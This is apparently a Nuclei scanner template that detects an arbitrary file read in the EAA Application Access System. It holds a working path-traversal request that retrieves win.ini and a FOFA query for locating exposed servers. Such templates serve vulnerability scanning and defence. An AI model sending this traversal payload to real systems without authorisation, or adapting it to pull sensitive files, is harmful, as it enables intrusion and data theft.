id: eaa-app-lfi

info:
  name: EAA Application Access System - Arbitary File Read
  author: momika233
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="EAA益和应用接入系统"
  tags: eaa,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename=win.ini"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203b9dd25baf2ecfa98a67437f7222f4dc7de00ba8405f6ab537a2ca7fce96d42f0221009ad4a44e3d55ca01aed08dc20ecddaa4c648839d5d20fd6cef49bf5a6c9cdc2b:922c64590222798bb761d5b6d8e72950
